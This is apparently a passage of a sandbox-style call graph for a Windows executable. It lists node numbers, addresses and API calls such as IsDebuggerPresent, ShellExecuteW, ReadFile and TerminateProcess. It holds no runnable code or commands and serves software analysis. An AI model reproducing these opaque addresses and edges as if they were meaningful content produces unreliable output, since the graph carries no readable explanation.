86339 411951 86256->86339 86261 40d751 86351 40f4e0 SystemParametersInfoW SystemParametersInfoW 86261->86351 86263 40d75f 86352 40d590 GetCurrentDirectoryW 86263->86352 86265 40d767 SystemParametersInfoW 86266 40d794 86265->86266 86267 40d78d FreeLibrary 86265->86267 86268 408f40 VariantClear 86266->86268 86267->86266 86269 40d79d 86268->86269 86270 408f40 VariantClear 86269->86270 86271 40d7a6 86270->86271 86271->86183 86278 4118da 46 API calls 86271->86278 86272->86156 86273->86160 86278->86183 86279->86186 86280->86194 86281->86202 86284 416b52 86282->86284 86285 416b8f 86284->86285 86286 416b70 Sleep 86284->86286 86290 41f677 86284->86290 86285->86200 86285->86205 86287 416b85 86286->86287 86287->86284 86287->86285 86288->86207 86289->86197 86291 41f683 86290->86291 86295 41f69e 86290->86295 86292 41f68f 86291->86292 86291->86295 86298 417f77 46 API calls 86292->86298 86294 41f6b1 HeapAlloc 86294->86295 86297 41f6d8 86294->86297 86295->86294 86295->86297 86296 41f694 86296->86284 86297->86284 86298->86296 86301 416b0d 86299->86301 86300 4135bb 45 API calls 86300->86301 86301->86300 86302 416b43 86301->86302 86303 416b24 Sleep 86301->86303 86302->86225 86304 416b39 86303->86304 86304->86301 86304->86302 86305->86238 86307 41377c 86306->86307 86308 413753 RtlFreeHeap 86306->86308 86307->86236 86308->86307 86309 413768 86308->86309 86315 417f77 46 API calls 86309->86315 86311 41376e GetLastError 86311->86307 86316 417daa 86312->86316 86315->86311 86317 417dc9 86316->86317 86318 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86317->86318 86321 417eb5 86318->86321 86320 417ed1 GetCurrentProcess TerminateProcess 86320->86244 86322 41a208 86321->86322 86323 41a210 86322->86323 86324 41a212 IsDebuggerPresent 86322->86324 86323->86320 86330 41fe19 86324->86330 86327 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86328 421ff0 86327->86328 86329 421ff8 GetCurrentProcess TerminateProcess 86327->86329 86328->86329 86329->86320 86330->86327 86331->86248 86333 408f48 86332->86333 86334 4265c7 VariantClear 86333->86334 86335 408f55 86333->86335 86334->86335 86335->86253 86392 40ebd0 86336->86392 86396 4182cb 86339->86396 86341 41195e 86403 4181f2 LeaveCriticalSection 86341->86403 86343 40d748 86344 4119b0 86343->86344 86345 4119d6 86344->86345 86346 4119bc 86344->86346 86345->86261 86346->86345 86438 417f77 46 API calls 86346->86438 86348 4119c6 86439 417f25 10 API calls 86348->86439 86350 4119d1 86350->86261 86351->86263 86440 401f20 86352->86440 86354 40d5b6 IsDebuggerPresent 86355 40d5c4 86354->86355 86356 42e1bb MessageBoxA 86354->86356 86357 42e1d4 86355->86357 86358 40d5e3 86355->86358 86356->86357 86612 403a50 52 API calls 86357->86612 86510 40f520 86358->86510 86362 40d5fd GetFullPathNameW 86522 401460 86362->86522 86364 40d63b 86365 42e231 SetCurrentDirectoryW 86364->86365 86367 40d643 86364->86367 86365->86367 86366 40d64c 86537 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86366->86537 86367->86366 86613 432fee 6 API calls 86367->86613 86370 42e252 86370->86366 86372 42e25a GetModuleFileNameW 86370->86372 86374 42e274 86372->86374 86375 42e2cb GetForegroundWindow ShellExecuteW 86372->86375 86614 401b10 86374->86614 86377 40d688 86375->86377 86376 40d656 86379 40d669 86376->86379 86382 40e0c0 74 API calls 86376->86382 86384 40d692 SetCurrentDirectoryW 86377->86384 86545 4091e0 86379->86545 86382->86379 86384->86265 86386 42e28d 86621 40d200 52 API calls 86386->86621 86389 42e299 GetForegroundWindow ShellExecuteW 86390 42e2c6 86389->86390 86390->86377 86391 40ec00 LoadLibraryA GetProcAddress 86391->86256 86393 40d72e 86392->86393 86394 40ebd6 LoadLibraryA 86392->86394 86393->86256 86393->86391 86394->86393 86395 40ebe7 GetProcAddress 86394->86395 86395->86393 86397 4182e0 86396->86397 86398 4182f3 EnterCriticalSection 86396->86398 86404 418209 86397->86404 86398->86341 86400 4182e6 86400->86398 86431 411924 46 API calls 86400->86431 86403->86343 86405 418215 86404->86405 86406 418225 86405->86406 86407 41823d 86405->86407 86432 418901 46 API calls 86406->86432 86409 416b04 45 API calls 86407->86409 86415 41824b 86407->86415 86411 418256 86409->86411 86410 41822a 86433 418752 46 API calls 86410->86433 86413 41825d 86411->86413 86414 41826c 86411->86414 86435 417f77 46 API calls 86413->86435 86419 4182cb 45 API calls 86414->86419 86415->86400 86416 418231 86434 411682 GetModuleHandleW GetProcAddress ExitProcess 86416->86434 86421 418273 86419->86421 86422 4182a6 86421->86422 86423 41827b InitializeCriticalSectionAndSpinCount 86421->86423 86424 413748 45 API calls 86422->86424 86425 418297 86423->86425 86426 41828b 86423->86426 86424->86425 86437 4182c2 LeaveCriticalSection 86425->86437 86427 413748 45 API calls 86426->86427 86428 418291 86427->86428 86436 417f77 46 API calls 86428->86436 86432->86410 86433->86416 86435->86415 86436->86425 86437->86415 86438->86348 86439->86350 86622 40e6e0 86440->86622 86444 401f41 GetModuleFileNameW 86640 410100 86444->86640 86446 401f5c 86652 410960 86446->86652 86449 401b10 52 API calls 86450 401f81 86449->86450 86655 401980 86450->86655 86452 401f8e 86453 408f40 VariantClear 86452->86453 86454 401f9d 86453->86454 86455 401b10 52 API calls 86454->86455 86456 401fb4 86455->86456 86457 401980 53 API calls 86456->86457 86458 401fc3 86457->86458 86459 401b10 52 API calls 86458->86459 86460 401fd2 86459->86460 86663 40c2c0 86460->86663 86462 401fe1 86463 40bc70 52 API calls 86462->86463 86464 401ff3 86463->86464 86681 401a10 86464->86681 86466 401ffe 86688 4114ab 86466->86688 86469 428b05 86471 401a10 52 API calls 86469->86471 86470 402017 86472 4114ab 58 API calls 86470->86472 86473 428b18 86471->86473 86474 402022 86472->86474 86476 401a10 52 API calls 86473->86476 86474->86473 86475 40202d 86474->86475 86477 4114ab 58 API calls 86475->86477 86478 428b33 86476->86478 86479 402038 86477->86479 86481 428b3b GetModuleFileNameW 86478->86481 86480 402043 86479->86480 86479->86481 86482 4114ab 58 API calls 86480->86482 86483 401a10 52 API calls 86481->86483 86484 40204e 86482->86484 86485 428b6c 86483->86485 86489 428b90 86484->86489 86490 401a10 52 API calls 86484->86490 86501 402092 86484->86501 86486 40e0a0 52 API calls 86485->86486 86487 428b7a 86486->86487 86491 401a10 52 API calls 86487->86491 86488 4020a3 86492 428bc6 86488->86492 86696 40e830 53 API calls 86488->86696 86496 401a10 52 API calls 86489->86496 86493 402073 86490->86493 86494 428b88 86491->86494 86499 401a10 52 API calls 86493->86499 86494->86489 86505 4020d0 86496->86505 86497 4020bb 86697 40cf00 53 API calls 86497->86697 86499->86501 86500 4020c6 86502 408f40 VariantClear 86500->86502 86501->86488 86501->86489 86502->86505 86504 402110 86507 408f40 VariantClear 86504->86507 86505->86504 86508 401a10 52 API calls 86505->86508 86698 40cf00 53 API calls 86505->86698 86699 40e6a0 53 API calls 86505->86699 86509 402120 86507->86509 86508->86505 86509->86354 86511 4295c9 86510->86511 86512 40f53c 86510->86512 86514 4295d9 GetOpenFileNameW 86511->86514 87375 410120 86512->87375 86514->86512 86516 40d5f5 86514->86516 86515 40f545 87379 4102b0 SHGetMalloc 86515->87379 86516->86362 86516->86364 86518 40f54c 87384 410190 GetFullPathNameW 86518->87384 86520 40f559 87395 40f570 86520->87395 87457 402400 86522->87457 86524 40146f 86527 428c29 86524->86527 87466 401500 86524->87466 86526 40147c 86526->86527 87474 40d440 86526->87474 86529 401489 86529->86527 86530 401491 GetFullPathNameW 86529->86530 86531 402160 52 API calls 86530->86531 86532 4014bb 86531->86532 86533 402160 52 API calls 86532->86533 86534 4014c8 86533->86534 86534->86527 86535 402160 52 API calls 86534->86535 86536 4014ee 86535->86536 86536->86364 86538 428361 86537->86538 86539 4103fc LoadImageW RegisterClassExW 86537->86539 87494 44395e EnumResourceNamesW LoadImageW 86538->87494 87493 410490 7 API calls 86539->87493 86542 40d651 86544 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86542->86544 86543 428368 86544->86376 86546 409202 86545->86546 86547 42d7ad 86545->86547 86601 409216 86546->86601 87766 410940 331 API calls 86546->87766 87769 45e737 90 API calls 86547->87769 86550 409386 86551 40939c 86550->86551 87767 40f190 10 API calls 86550->87767 86551->86377 86611 401000 Shell_NotifyIconW 86551->86611 86553 4095b2 86553->86551 86555 4095bf 86553->86555 86554 409253 PeekMessageW 86554->86601 87768 401a50 331 API calls 86555->87768 86557 40d410 VariantClear 86557->86601 86558 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86558->86551 86560 4095f9 86558->86560 86559 42d8cd Sleep 86559->86601 86564 42e158 TranslateMessage DispatchMessageW GetMessageW 86560->86564 86562 42e13b 87787 40d410 VariantClear 86562->87787 86564->86564 86567 42e188 86564->86567 86566 409567 PeekMessageW 86566->86601 86567->86551 86570 44c29d 52 API calls 86610 4094e0 86570->86610 86571 46f3c1 107 API calls 86571->86601 86572 40e0a0 52 API calls 86572->86601 86573 46fdbf 108 API calls 86573->86610 86574 409551 TranslateMessage DispatchMessageW 86574->86566 86576 42dcd2 WaitForSingleObject 86577 42dcf0 GetExitCodeProcess CloseHandle 86576->86577 86576->86601 87776 40d410 VariantClear 86577->87776 86579 42dd3d Sleep 86579->86610 86580 47d33e 309 API calls 86580->86601 86582 40c620 timeGetTime 86582->86610 86584 4094cf Sleep 86584->86610 86586 42d94d timeGetTime 87772 465124 53 API calls 86586->87772 86590 465124 53 API calls 86590->86610 86591 42dd89 CloseHandle 86591->86610 86593 42de19 GetExitCodeProcess CloseHandle 86593->86610 86596 42de88 Sleep 86596->86601 86601->86550 86601->86554 86601->86557 86601->86559 86601->86562 86601->86566 86601->86571 86601->86572 86601->86574 86601->86576 86601->86579 86601->86580 86601->86584 86601->86586 86602 42e0cc VariantClear 86601->86602 86603 45e737 90 API calls 86601->86603 86604 408f40 VariantClear 86601->86604 86601->86610 87495 4091b0 86601->87495 87553 40afa0 86601->87553 87579 408fc0 86601->87579 87614 408cc0 86601->87614 87628 40d150 86601->87628 87633 40d170 86601->87633 87639 4096a0 86601->87639 87770 465124 53 API calls 86601->87770 87771 40c620 timeGetTime 86601->87771 87786 40e270 VariantClear 86601->87786 86602->86601 86603->86601 86604->86601 86606 401980 53 API calls 86606->86610 86607 408f40 VariantClear 86607->86610 86608 401b10 52 API calls 86608->86610 86610->86570 86610->86573 86610->86582 86610->86590 86610->86591 86610->86593 86610->86596 86610->86601 86610->86606 86610->86607 86610->86608 87773 45178a 54 API calls 86610->87773 87774 47d33e 331 API calls 86610->87774 87775 453bc6 54 API calls 86610->87775 87777 40d410 VariantClear 86610->87777 87778 443d19 67 API calls 86610->87778 87779 4574b4 VariantClear 86610->87779 87780 403cd0 86610->87780 87784 4731e1 VariantClear 86610->87784 87785 4331a2 6 API calls 86610->87785 86611->86377 86612->86364 86613->86370 86615 401b16 86614->86615 86616 4115d7 52 API calls 86615->86616 86619 401b63 86615->86619 86617 401b4b 86616->86617 86618 4115d7 52 API calls 86617->86618 86618->86619 86620 40d200 52 API calls 86619->86620 86620->86386 86621->86389 86623 40bc70 52 API calls 86622->86623 86624 401f31 86623->86624 86625 402560 86624->86625 86626 40256d 86625->86626 86627 402160 52 API calls 86626->86627 86629 402593 86627->86629 86631 4025bd 86629->86631 86700 401c90 86629->86700 86630 4026f0 52 API calls 86630->86631 86631->86630 86633 4026a7 86631->86633 86635 401b10 52 API calls 86631->86635 86638 401c90 52 API calls 86631->86638 86703 40d7c0 52 API calls 86631->86703 86632 4026db 86632->86444 86633->86632 86634 401b10 52 API calls 86633->86634 86636 4026d1 86634->86636 86635->86631 86704 40d7c0 52 API calls 86636->86704 86638->86631 86705 40f760 86640->86705 86643 410118 86643->86446 86645 42805d 86646 42806a 86645->86646 86761 431e58 86645->86761 86648 413748 46 API calls 86646->86648 86649 428078 86648->86649 86650 431e58 82 API calls 86649->86650 86651 428084 86650->86651 86651->86446 86653 4115d7 52 API calls 86652->86653 86654 401f74 86653->86654 86654->86449 86656 4019a3 86655->86656 86660 401985 86655->86660 86657 4019b8 86656->86657 86656->86660 87364 403e10 53 API calls 86657->87364 86659 40199f 86659->86452 86660->86659 87363 403e10 53 API calls 86660->87363 86661 4019c4 86661->86452 86664 40c2c7 86663->86664 86665 40c30e 86663->86665 86668 40c2d3 86664->86668 86669 426c79 86664->86669 86666 40c315 86665->86666 86667 426c2b 86665->86667 86670 40c321 86666->86670 86671 426c5a 86666->86671 86673 426c4b 86667->86673 86674 426c2e 86667->86674 87365 403ea0 52 API calls 86668->87365 87370 4534e3 52 API calls 86669->87370 87366 403ea0 52 API calls 86670->87366 87369 4534e3 52 API calls 86671->87369 87368 4534e3 52 API calls 86673->87368 86680 40c2de 86674->86680 87367 4534e3 52 API calls 86674->87367 86680->86462 86682 401a30 86681->86682 86683 401a17 86681->86683 86685 402160 52 API calls 86682->86685 86684 401a2d 86683->86684 87371 403c30 52 API calls 86683->87371 86684->86466 86686 401a3d 86685->86686 86686->86466 86689 411523 86688->86689 86690 4114ba 86688->86690 87374 4113a8 58 API calls 86689->87374 86695 40200c 86690->86695 87372 417f77 46 API calls 86690->87372 86693 4114c6 87373 417f25 10 API calls 86693->87373 86695->86469 86695->86470 86696->86497 86697->86500 86698->86505 86699->86505 86701 4026f0 52 API calls 86700->86701 86702 401c97 86701->86702 86702->86629 86703->86631 86704->86632 86765 40f6f0 86705->86765 86707 40f77b 86773 40f850 86707->86773 86712 427c2a 86802 414d04 86712->86802 86714 40f7fc 86714->86712 86715 40f804 86714->86715 86789 414a46 86715->86789 86719 40f80e 86719->86643 86724 4528bd 86719->86724 86721 427c59 86808 414fe2 86721->86808 86723 427c79 86725 4150d1 81 API calls 86724->86725 86726 452930 86725->86726 87305 452719 86726->87305 86729 452948 86729->86645 86730 414d04 61 API calls 86731 452966 86730->86731 86732 414d04 61 API calls 86731->86732 86733 452976 86732->86733 86734 414d04 61 API calls 86733->86734 86735 45298f 86734->86735 86736 414d04 61 API calls 86735->86736 86737 4529aa 86736->86737 86738 4150d1 81 API calls 86737->86738 86739 4529c4 86738->86739 86740 4135bb 46 API calls 86739->86740 86741 4529cf 86740->86741 86742 4135bb 46 API calls 86741->86742 86743 4529db 86742->86743 86744 414d04 61 API calls 86743->86744 86745 4529ec 86744->86745 86746 44afef GetSystemTimeAsFileTime 86745->86746 86747 452a00 86746->86747 86748 452a36 86747->86748 86749 452a13 86747->86749 86750 452aa5 86748->86750 86751 452a3c 86748->86751 86752 413748 46 API calls 86749->86752 86754 413748 46 API calls 86750->86754 87311 44b1a9 86751->87311 86755 452a1c 86752->86755 86758 452aa3 86754->86758 86756 413748 46 API calls 86755->86756 86759 452a25 86756->86759 86757 452a9d 86760 413748 46 API calls 86757->86760 86758->86645 86759->86645 86760->86758 86762 431e64 86761->86762 86764 431e6a 86761->86764 86763 414a46 82 API calls 86762->86763 86763->86764 86764->86646 86766 425de2 86765->86766 86767 40f6fc 86765->86767 86766->86707 86768 40f710 WideCharToMultiByte 86767->86768 86769 40f756 86768->86769 86770 40f728 86768->86770 86769->86707 86771 4115d7 52 API calls 86770->86771 86772 40f735 WideCharToMultiByte 86771->86772 86772->86707 86775 40f85d 86773->86775 86776 40f7ab 86775->86776 86821 414db8 86775->86821 86777 4149c2 86776->86777 86833 414904 86777->86833 86779 40f7e9 86779->86712 86780 40f5c0 86779->86780 86785 40f5cd 86780->86785 86781 414d04 61 API calls 86781->86785 86783 425d11 86784 4150d1 81 API calls 86783->86784 86786 425d33 86784->86786 86785->86781 86785->86783 86788 40f691 86785->86788 86921 4150d1 86785->86921 86787 414d04 61 API calls 86786->86787 86787->86788 86788->86714 86790 414a52 86789->86790 86791 414a64 86790->86791 86792 414a79 86790->86792 87061 417f77 46 API calls 86791->87061 86794 415471 47 API calls 86792->86794 86796 414a74 86792->86796 86797 414a92 86794->86797 86795 414a69 87062 417f25 10 API calls 86795->87062 86796->86719 87045 4149d9 86797->87045 87130 414c76 86802->87130 86804 414d1c 86805 44afef 86804->86805 87298 442c5a 86805->87298 86807 44b00d 86807->86721 86809 414fee 86808->86809 86810 414ffa 86809->86810 86811 41500f 86809->86811 87302 417f77 46 API calls 86810->87302 86813 415471 47 API calls 86811->86813 86815 415017 86813->86815 86814 414fff 87303 417f25 10 API calls 86814->87303 86817 414e4e 51 API calls 86815->86817 86818 415024 86817->86818 87304 41503d LeaveCriticalSection LeaveCriticalSection 86818->87304 86820 41500a 86820->86723 86822 414dd6 86821->86822 86823 414deb 86821->86823 86830 417f77 46 API calls 86822->86830 86823->86822 86825 414df2 86823->86825 86829 414de6 86825->86829 86832 418f98 77 API calls 86825->86832 86826 414ddb 86831 417f25 10 API calls 86826->86831 86829->86775 86830->86826 86831->86829 86832->86829 86836 414910 86833->86836 86834 414923 86889 417f77 46 API calls 86834->86889 86836->86834 86838 414951 86836->86838 86837 414928 86890 417f25 10 API calls 86837->86890 86852 41d4d1 86838->86852 86841 414956 86842 41496a 86841->86842 86843 41495d 86841->86843 86844 414992 86842->86844 86845 414972 86842->86845 86891 417f77 46 API calls 86843->86891 86869 41d218 86844->86869 86892 417f77 46 API calls 86845->86892 86849 414933 86849->86779 86853 41d4dd 86852->86853 86854 4182cb 46 API calls 86853->86854 86867 41d4eb 86854->86867 86855 41d560 86894 41d5fb 86855->86894 86856 41d567 86858 416b04 46 API calls 86856->86858 86860 41d56e 86858->86860 86859 41d5f0 86859->86841 86860->86855 86861 41d57c InitializeCriticalSectionAndSpinCount 86860->86861 86862 41d59c 86861->86862 86863 41d5af EnterCriticalSection 86861->86863 86866 413748 46 API calls 86862->86866 86863->86855 86864 418209 46 API calls 86864->86867 86866->86855 86867->86855 86867->86856 86867->86864 86897 4154b2 47 API calls 86867->86897 86898 415520 LeaveCriticalSection LeaveCriticalSection 86867->86898 86870 41d23a 86869->86870 86871 41d255 86870->86871 86883 41d26c 86870->86883 86903 417f77 46 API calls 86871->86903 86872 41d421 86875 41d47a 86872->86875 86876 41d48c 86872->86876 86874 41d25a 86904 417f25 10 API calls 86874->86904 86908 417f77 46 API calls 86875->86908 86900 422bf9 86876->86900 86880 41d47f 86909 417f25 10 API calls 86880->86909 86881 41499d 86893 4149b8 LeaveCriticalSection LeaveCriticalSection 86881->86893 86883->86872 86883->86875 86905 41341f 58 API calls 86883->86905 86885 41d41a 86885->86872 86906 41341f 58 API calls 86885->86906 86887 41d439 86887->86872 86907 41341f 58 API calls 86887->86907 86889->86837 86890->86849 86891->86849 86892->86849 86893->86849 86899 4181f2 LeaveCriticalSection 86894->86899 86896 41d602 86896->86859 86897->86867 86898->86867 86899->86896 86910 422b35 86900->86910 86902 422c14 86902->86881 86903->86874 86904->86881 86905->86885 86906->86887 86907->86872 86908->86880 86909->86881 86912 422b41 86910->86912 86911 422b54 86913 417f77 46 API calls 86911->86913 86912->86911 86914 422b8a 86912->86914 86915 422b59 86913->86915 86917 422400 109 API calls 86914->86917 86916 417f25 10 API calls 86915->86916 86920 422b63 86916->86920 86918 422ba4 86917->86918 86919 422bcb LeaveCriticalSection 86918->86919 86919->86920 86920->86902 86922 4150dd 86921->86922 86923 4150e9 86922->86923 86925 41510f 86922->86925 86952 417f77 46 API calls 86923->86952 86934 415471 86925->86934 86926 4150ee 86953 417f25 10 API calls 86926->86953 86933 4150f9 86933->86785 86935 415483 86934->86935 86936 4154a5 EnterCriticalSection 86934->86936 86935->86936 86937 41548b 86935->86937 86938 415117 86936->86938 86939 4182cb 46 API calls 86937->86939 86940 415047 86938->86940 86939->86938 86941 415067 86940->86941 86942 415057 86940->86942 86947 415079 86941->86947 86955 414e4e 86941->86955 87010 417f77 46 API calls 86942->87010 86946 41505c 86954 415143 LeaveCriticalSection LeaveCriticalSection 86946->86954 86972 41443c 86947->86972 86950 4150b9 86985 41e1f4 86950->86985 86952->86926 86953->86933 86954->86933 86956 414e61 86955->86956 86957 414e79 86955->86957 87011 417f77 46 API calls 86956->87011 86959 414139 46 API calls 86957->86959 86961 414e80 86959->86961 86960 414e66 87012 417f25 10 API calls 86960->87012 86963 41e1f4 51 API calls 86961->86963 86964 414e97 86963->86964 86965 414f09 86964->86965 86967 414ec9 86964->86967 86971 414e71 86964->86971 87013 417f77 46 API calls 86965->87013 86968 41e1f4 51 API calls 86967->86968 86967->86971 86969 414f64 86968->86969 86970 41e1f4 51 API calls 86969->86970 86969->86971 86970->86971 86971->86947 86973 414455 86972->86973 86977 414477 86972->86977 86974 414139 46 API calls 86973->86974 86973->86977 86975 414470 86974->86975 87014 41b7b2 77 API calls 86975->87014 86978 414139 86977->86978 86979 414145 86978->86979 86980 41415a 86978->86980 87015 417f77 46 API calls 86979->87015 86980->86950 86982 41414a 87016 417f25 10 API calls 86982->87016 86984 414155 86984->86950 86986 41e200 86985->86986 86987 41e223 86986->86987 86988 41e208 86986->86988 86989 41e22f 86987->86989 86994 41e269 86987->86994 87037 417f8a 46 API calls 86988->87037 87039 417f8a 46 API calls 86989->87039 86992 41e20d 87038 417f77 46 API calls 86992->87038 86993 41e234 87040 417f77 46 API calls 86993->87040 87017 41ae56 86994->87017 86998 41e23c 87041 417f25 10 API calls 86998->87041 86999 41e26f 87001 41e291 86999->87001 87002 41e27d 86999->87002 87042 417f77 46 API calls 87001->87042 87027 41e17f 87002->87027 87005 41e215 87005->86946 87006 41e289 87044 41e2c0 LeaveCriticalSection 87006->87044 87007 41e296 87043 417f8a 46 API calls 87007->87043 87010->86946 87011->86960 87012->86971 87013->86971 87014->86977 87015->86982 87016->86984 87018 41ae62 87017->87018 87019 41aebc 87018->87019 87021 4182cb 46 API calls 87018->87021 87020 41aec1 EnterCriticalSection 87019->87020 87022 41aede 87019->87022 87020->87022 87023 41ae8e 87021->87023 87022->86999 87024 41aeaa 87023->87024 87025 41ae97 InitializeCriticalSectionAndSpinCount 87023->87025 87026 41aeec LeaveCriticalSection 87024->87026 87025->87024 87026->87019 87028 41aded 46 API calls 87027->87028 87029 41e18e 87028->87029 87030 41e1a4 SetFilePointer 87029->87030 87031 41e194 87029->87031 87033 41e1c3 87030->87033 87034 41e1bb GetLastError 87030->87034 87032 417f77 46 API calls 87031->87032 87035 41e199 87032->87035 87033->87035 87036 417f9d 46 API calls 87033->87036 87034->87033 87035->87006 87036->87035 87037->86992 87038->87005 87039->86993 87040->86998 87041->87005 87042->87007 87043->87006 87044->87005 87046 4149ea 87045->87046 87047 4149fe 87045->87047 87091 417f77 46 API calls 87046->87091 87049 4149fa 87047->87049 87051 41443c 77 API calls 87047->87051 87063 414ab2 LeaveCriticalSection LeaveCriticalSection 87049->87063 87050 4149ef 87092 417f25 10 API calls 87050->87092 87053 414a0a 87051->87053 87064 41d8c2 87053->87064 87056 414139 46 API calls 87057 414a18 87056->87057 87068 41d7fe 87057->87068 87059 414a1e 87059->87049 87060 413748 46 API calls 87059->87060 87060->87049 87061->86795 87062->86796 87063->86796 87065 414a12 87064->87065 87066 41d8d2 87064->87066 87065->87056 87066->87065 87067 413748 46 API calls 87066->87067 87067->87065 87069 41d80a 87068->87069 87070 41d812 87069->87070 87071 41d82d 87069->87071 87108 417f8a 46 API calls 87070->87108 87073 41d839 87071->87073 87076 41d873 87071->87076 87110 417f8a 46 API calls 87073->87110 87074 41d817 87109 417f77 46 API calls 87074->87109 87079 41ae56 48 API calls 87076->87079 87078 41d83e 87111 417f77 46 API calls 87078->87111 87082 41d879 87079->87082 87080 41d81f 87080->87059 87085 41d893 87082->87085 87086 41d887 87082->87086 87083 41d846 87112 417f25 10 API calls 87083->87112 87113 417f77 46 API calls 87085->87113 87093 41d762 87086->87093 87089 41d88d 87114 41d8ba LeaveCriticalSection 87089->87114 87091->87050 87092->87049 87115 41aded 87093->87115 87095 41d7c8 87128 41ad67 47 API calls 87095->87128 87097 41d772 87097->87095 87098 41aded 46 API calls 87097->87098 87106 41d7a6 87097->87106 87101 41d79d 87098->87101 87099 41aded 46 API calls 87102 41d7b2 CloseHandle 87099->87102 87100 41d7d0 87107 41d7f2 87100->87107 87129 417f9d 46 API calls 87100->87129 87103 41aded 46 API calls 87101->87103 87102->87095 87104 41d7be GetLastError 87102->87104 87103->87106 87104->87095 87106->87095 87106->87099 87107->87089 87108->87074 87109->87080 87110->87078 87111->87083 87112->87080 87113->87089 87114->87080 87116 41ae12 87115->87116 87117 41adfa 87115->87117 87120 417f8a 46 API calls 87116->87120 87122 41ae51 87116->87122 87118 417f8a 46 API calls 87117->87118 87119 41adff 87118->87119 87123 417f77 46 API calls 87119->87123 87121 41ae23 87120->87121 87124 417f77 46 API calls 87121->87124 87122->87097 87125 41ae07 87123->87125 87126 41ae2b 87124->87126 87125->87097 87127 417f25 10 API calls 87126->87127 87127->87125 87128->87100 87129->87107 87131 414c82 87130->87131 87132 414cc3 87131->87132 87133 414c96 87131->87133 87134 414cbb 87131->87134 87135 415471 47 API calls 87132->87135 87157 417f77 46 API calls 87133->87157 87134->86804 87136 414ccb 87135->87136 87143 414aba 87136->87143 87139 414cb0 87158 417f25 10 API calls 87139->87158 87147 414ad8 87143->87147 87150 414af2 87143->87150 87144 414ae2 87210 417f77 46 API calls 87144->87210 87146 414b2d 87146->87150 87151 414c38 87146->87151 87153 414139 46 API calls 87146->87153 87160 41dfcc 87146->87160 87190 41d8f3 87146->87190 87212 41e0c2 46 API calls 87146->87212 87147->87144 87147->87146 87147->87150 87159 414cfa LeaveCriticalSection LeaveCriticalSection 87150->87159 87213 417f77 46 API calls 87151->87213 87153->87146 87156 414ae7 87211 417f25 10 API calls 87156->87211 87157->87139 87158->87134 87159->87134 87161 41dfd8 87160->87161 87162 41dfe0 87161->87162 87163 41dffb 87161->87163 87283 417f8a 46 API calls 87162->87283 87165 41e007 87163->87165 87168 41e041 87163->87168 87285 417f8a 46 API calls 87165->87285 87166 41dfe5 87284 417f77 46 API calls 87166->87284 87172 41e063 87168->87172 87173 41e04e 87168->87173 87170 41e00c 87286 417f77 46 API calls 87170->87286 87175 41ae56 48 API calls 87172->87175 87288 417f8a 46 API calls 87173->87288 87179 41e069 87175->87179 87176 41e014 87287 417f25 10 API calls 87176->87287 87177 41e053 87289 417f77 46 API calls 87177->87289 87178 41dfed 87178->87146 87182 41e077 87179->87182 87183 41e08b 87179->87183 87214 41da15 87182->87214 87290 417f77 46 API calls 87183->87290 87186 41e083 87292 41e0ba LeaveCriticalSection 87186->87292 87187 41e090 87291 417f8a 46 API calls 87187->87291 87191 41d900 87190->87191 87195 41d915 87190->87195 87296 417f77 46 API calls 87191->87296 87193 41d905 87297 417f25 10 API calls 87193->87297 87196 41d94a 87195->87196 87202 41d910 87195->87202 87293 420603 87195->87293 87198 414139 46 API calls 87196->87198 87199 41d95e 87198->87199 87200 41dfcc 59 API calls 87199->87200 87201 41d965 87200->87201 87201->87202 87203 414139 46 API calls 87201->87203 87202->87146 87204 41d988 87203->87204 87204->87202 87205 414139 46 API calls 87204->87205 87206 41d994 87205->87206 87206->87202 87207 414139 46 API calls 87206->87207 87208 41d9a1 87207->87208 87209 414139 46 API calls 87208->87209 87209->87202 87210->87156 87211->87150 87212->87146 87213->87156 87215 41da31 87214->87215 87216 41da4c 87214->87216 87217 417f8a 46 API calls 87215->87217 87218 41da5b 87216->87218 87221 41da7a 87216->87221 87220 41da36 87217->87220 87219 417f8a 46 API calls 87218->87219 87222 41da60 87219->87222 87224 417f77 46 API calls 87220->87224 87223 41da98 87221->87223 87235 41daac 87221->87235 87225 417f77 46 API calls 87222->87225 87226 417f8a 46 API calls 87223->87226 87227 41da3e 87224->87227 87229 41da67 87225->87229 87231 41da9d 87226->87231 87227->87186 87228 41db02 87230 417f8a 46 API calls 87228->87230 87232 417f25 10 API calls 87229->87232 87233 41db07 87230->87233 87234 417f77 46 API calls 87231->87234 87232->87227 87236 417f77 46 API calls 87233->87236 87237 41daa4 87234->87237 87235->87227 87235->87228 87238 41dae1 87235->87238 87239 41db1b 87235->87239 87236->87237 87240 417f25 10 API calls 87237->87240 87238->87228 87246 41daec ReadFile 87238->87246 87241 416b04 46 API calls 87239->87241 87240->87227 87243 41db31 87241->87243 87249 41db59 87243->87249 87250 41db3b 87243->87250 87244 41dc17 87245 41df8f GetLastError 87244->87245 87253 41dc2b 87244->87253 87247 41de16 87245->87247 87248 41df9c 87245->87248 87246->87244 87246->87245 87257 417f9d 46 API calls 87247->87257 87262 41dd9b 87247->87262 87251 417f77 46 API calls 87248->87251 87254 420494 48 API calls 87249->87254 87252 417f77 46 API calls 87250->87252 87255 41dfa1 87251->87255 87256 41db40 87252->87256 87253->87262 87263 41dc47 87253->87263 87266 41de5b 87253->87266 87258 41db67 87254->87258 87259 417f8a 46 API calls 87255->87259 87260 417f8a 46 API calls 87256->87260 87257->87262 87258->87246 87259->87262 87260->87227 87261 413748 46 API calls 87261->87227 87262->87227 87262->87261 87264 41dcab ReadFile 87263->87264 87271 41dd28 87263->87271 87267 41dcc9 GetLastError 87264->87267 87276 41dcd3 87264->87276 87265 41ded0 ReadFile 87268 41deef GetLastError 87265->87268 87274 41def9 87265->87274 87266->87262 87266->87265 87267->87263 87267->87276 87268->87266 87268->87274 87269 41ddec MultiByteToWideChar 87269->87262 87270 41de10 GetLastError 87269->87270 87270->87247 87271->87262 87272 41dda3 87271->87272 87273 41dd96 87271->87273 87279 41dd60 87271->87279 87272->87279 87280 41ddda 87272->87280 87275 417f77 46 API calls 87273->87275 87274->87266 87278 420494 48 API calls 87274->87278 87275->87262 87276->87263 87277 420494 48 API calls 87276->87277 87277->87276 87278->87274 87279->87269 87281 420494 48 API calls 87280->87281 87282 41dde9 87281->87282 87282->87269 87283->87166 87284->87178 87285->87170 87286->87176 87287->87178 87288->87177 87289->87176 87290->87187 87291->87186 